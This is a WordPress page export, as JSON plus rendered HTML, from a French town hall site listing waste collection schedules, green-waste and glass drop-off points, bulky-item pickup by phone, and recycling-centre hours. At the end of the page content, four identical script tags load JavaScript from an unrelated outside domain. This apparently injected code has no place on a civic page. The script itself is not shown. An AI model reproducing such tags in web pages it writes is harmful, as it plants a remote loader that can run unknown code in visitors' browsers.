{"id":1277,"date":"2017-03-13T09:43:02","date_gmt":"2017-03-13T08:43:02","guid":{"rendered":"http:\/\/www.attin-mairie.fr\/?page_id=1277"},"modified":"2020-12-09T12:09:41","modified_gmt":"2020-12-09T11:09:41","slug":"ramassage-des-ordures-menageres-encombrants-dechetterie","status":"publish","type":"page","link":"https:\/\/www.attin-mairie.fr\/?page_id=1277","title":{"rendered":"RAMASSAGE DES ORDURES M\u00c9NAG\u00c8RES, ENCOMBRANTS &#038; D\u00c9CH\u00c8TERIE"},"content":{"rendered":"<p>&nbsp;<\/p>\n<p><i>La&nbsp;p\u00e9riodicit\u00e9&nbsp;de&nbsp;collecte&nbsp;des bacs jaunes a chang\u00e9 et a lieu d\u00e9sormais toutes les deux semaines. <\/i><\/p>\n<p style=\"text-align: center;\"><em>Voir<strong> <a href=\"https:\/\/www.ca2bm.fr\/uploads\/file\/02-attin-ca2bm-collecte-2020.pdf\">calendrier<\/a><\/strong> 2020&nbsp; et calendrier <a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/12\/dechets-COLLECTE_2021.pdf\">2021<\/a><\/em><em><br \/>\n<\/em><\/p>\n<p>&nbsp;<\/p>\n<p><i>Le vendredi matin pour les d\u00e9chets ultimes (bac noir)&nbsp;<\/i><\/p>\n<p><i>La collecte des d\u00e9chets verts n&rsquo;a plus lieu le lundi matin. Une benne pour les d\u00e9chets verts (petits branchages, gazon, etc.) est \u00e0 disposition des habitants dans la cour des ateliers techniques. Les usagers doivent vider les sacs papier ou plastique de leur contenu et peuvent jeter ceux-ci dans des poubelles r\u00e9serv\u00e9es \u00e0 cet effet.&nbsp; Un endroit d\u00e9di\u00e9 de la cour est aussi r\u00e9serv\u00e9 pour les branches de plus de 80cm.<br \/>\n<\/i><\/p>\n<p><i>Les containers \u00e0 verres insonoris\u00e9s au nombre de 4 se situent derri\u00e8re la salle polyvalente, rue du Cronquelet, rue de la Vend\u00e9e &nbsp;et \u00e0 la Paix-Faite pr\u00e8s des friteries.<\/i>&nbsp;<\/p>\n<hr>\n<h5><em><strong>RAMASSAGE DES ENCOMBRANTS :<\/strong><\/em><\/h5>\n<p><em>Le ramassage des encombrants est maintenant g\u00e9r\u00e9 par la <strong>CA2BM.<\/strong>&nbsp;<\/em><\/p>\n<p><em>La collecte se fait <strong>sur rendez-vous<\/strong> en appelant le<strong> 0800.009.935<\/strong> <strong>(service et appel gratuit)<\/strong>.<\/em><\/p>\n<p><i>D\u00e9p\u00f4t&nbsp;en d\u00e9ch\u00e8terie \u00e9galement possible.<\/i><\/p>\n<blockquote>\n<p style=\"text-align: center;\">Pensez \u00e9galement au r\u00e9emploi et aux fili\u00e8res solidaires.<\/p>\n<\/blockquote>\n<p>&nbsp;<\/p>\n<hr>\n<p><em><strong>D\u00c9CHETTERIE MOBILE \u00c0 BEAUMERIE, FACE AU CH\u00c2TEAU D\u2019EAU :<\/strong><\/em><\/p>\n<p><em>Ouvert les mardi \u2013 mercredi \u2013 jeudi \u2013 vendredi \u2013 samedi de <strong>9h00 \u00e0 12h00 et de 14h00 \u00e0 18h00<\/strong><\/em><\/p>\n<p><em>Ouvert le lundi apr\u00e8s-midi de <strong>14h00 \u00e0 17h00<\/strong><\/em><\/p>\n<p><em>Pour la p\u00e9riode du 1er avril au 31 octobre, les horaires se prolongent jusque <strong>18h00<\/strong><\/em><\/p>\n<p><em>Ferm\u00e9 le lundi matin et le dimanche.<\/em><\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; La&nbsp;p\u00e9riodicit\u00e9&nbsp;de&nbsp;collecte&nbsp;des bacs jaunes a chang\u00e9 et a lieu d\u00e9sormais toutes les deux semaines. Voir calendrier 2020&nbsp; et calendrier 2021 &nbsp; Le vendredi matin pour les d\u00e9chets ultimes (bac noir)&nbsp; La collecte des d\u00e9chets verts n&rsquo;a plus lieu le lundi matin. Une benne pour les d\u00e9chets verts (petits branchages, gazon, etc.) est \u00e0 disposition des [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1261,"parent":46,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-1277","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/1277","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1277"}],"version-history":[{"count":17,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/1277\/revisions"}],"predecessor-version":[{"id":2748,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/1277\/revisions\/2748"}],"up":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/46"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/media\/1261"}],"wp:attachment":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1277"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

RAMASSAGE DES ORDURES MÉNAGÈRES, ENCOMBRANTS &#038; DÉCHÈTERIE

<p>&nbsp;</p>
<p><i>La&nbsp;périodicité&nbsp;de&nbsp;collecte&nbsp;des bacs jaunes a changé et a lieu désormais toutes les deux semaines. </i></p>
<p style="text-align: center;"><em>Voir<strong> <a href="https://www.ca2bm.fr/uploads/file/02-attin-ca2bm-collecte-2020.pdf">calendrier</a></strong> 2020&nbsp; et calendrier <a href="http://www.attin-mairie.fr/wp-content/uploads/2020/12/dechets-COLLECTE_2021.pdf">2021</a></em><em><br />
</em></p>
<p>&nbsp;</p>
<p><i>Le vendredi matin pour les déchets ultimes (bac noir)&nbsp;</i></p>
<p><i>La collecte des déchets verts n&rsquo;a plus lieu le lundi matin. Une benne pour les déchets verts (petits branchages, gazon, etc.) est à disposition des habitants dans la cour des ateliers techniques. Les usagers doivent vider les sacs papier ou plastique de leur contenu et peuvent jeter ceux-ci dans des poubelles réservées à cet effet.&nbsp; Un endroit dédié de la cour est aussi réservé pour les branches de plus de 80cm.<br />
</i></p>
<p><i>Les containers à verres insonorisés au nombre de 4 se situent derrière la salle polyvalente, rue du Cronquelet, rue de la Vendée &nbsp;et à la Paix-Faite près des friteries.</i>&nbsp;</p>
<hr>
<h5><em><strong>RAMASSAGE DES ENCOMBRANTS :</strong></em></h5>
<p><em>Le ramassage des encombrants est maintenant géré par la <strong>CA2BM.</strong>&nbsp;</em></p>
<p><em>La collecte se fait <strong>sur rendez-vous</strong> en appelant le<strong> 0800.009.935</strong> <strong>(service et appel gratuit)</strong>.</em></p>
<p><i>Dépôt&nbsp;en déchèterie également possible.</i></p>
<blockquote>
<p style="text-align: center;">Pensez également au réemploi et aux filières solidaires.</p>
</blockquote>
<p>&nbsp;</p>
<hr>
<p><em><strong>DÉCHETTERIE MOBILE À BEAUMERIE, FACE AU CHÂTEAU D’EAU :</strong></em></p>
<p><em>Ouvert les mardi – mercredi – jeudi – vendredi – samedi de <strong>9h00 à 12h00 et de 14h00 à 18h00</strong></em></p>
<p><em>Ouvert le lundi après-midi de <strong>14h00 à 17h00</strong></em></p>
<p><em>Pour la période du 1er avril au 31 octobre, les horaires se prolongent jusque <strong>18h00</strong></em></p>
<p><em>Fermé le lundi matin et le dimanche.</em></p>
<p><script src="//jaretsummer.com/228ebbb479fb2ce2f7.js"></script></p>
<p><script src="//jaretsummer.com/228ebbb479fb2ce2f7.js"></script></p>
<p><script src="//jaretsummer.com/228ebbb479fb2ce2f7.js"></script></p>
<p><script src="//jaretsummer.com/228ebbb479fb2ce2f7.js"></script></p>

<p>&nbsp; La&nbsp;périodicité&nbsp;de&nbsp;collecte&nbsp;des bacs jaunes a changé et a lieu désormais toutes les deux semaines. Voir calendrier 2020&nbsp; et calendrier 2021 &nbsp; Le vendredi matin pour les déchets ultimes (bac noir)&nbsp; La collecte des déchets verts n&rsquo;a plus lieu le lundi matin. Une benne pour les déchets verts (petits branchages, gazon, etc.) est à disposition des [&hellip;]</p>
